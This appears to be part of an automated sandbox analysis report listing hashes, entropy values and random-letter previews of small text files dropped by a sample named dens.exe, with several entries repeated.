                                                                                                                                                                                                                                            Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                            MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                            SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                            SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                            SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                            MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                            SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                            SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                            SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                            MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                            SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                            SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                            SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.690394987545919
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                                                                                                                                                            MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                                                                                                                                            SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                                                                                                                                            SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                                                                                                                                            SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                            MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                            SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                            SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                            SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                            MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                            SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                            SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                            SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                            MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                            SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                            SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                            SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
